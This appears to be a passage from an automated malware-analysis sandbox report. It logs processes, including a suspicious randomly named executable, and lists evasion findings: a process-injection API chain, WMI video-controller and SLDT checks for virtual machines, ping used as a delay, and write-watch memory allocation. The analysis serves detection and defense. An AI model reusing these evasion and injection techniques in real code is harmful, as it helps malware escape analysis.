Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,

46_2_00000001400010C0

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\PerfDll\hyperProviderSavesinto.exe	Memory allocated: EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Memory allocated: 1ABB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch

Contains functionality to detect virtual machines (SLDT)

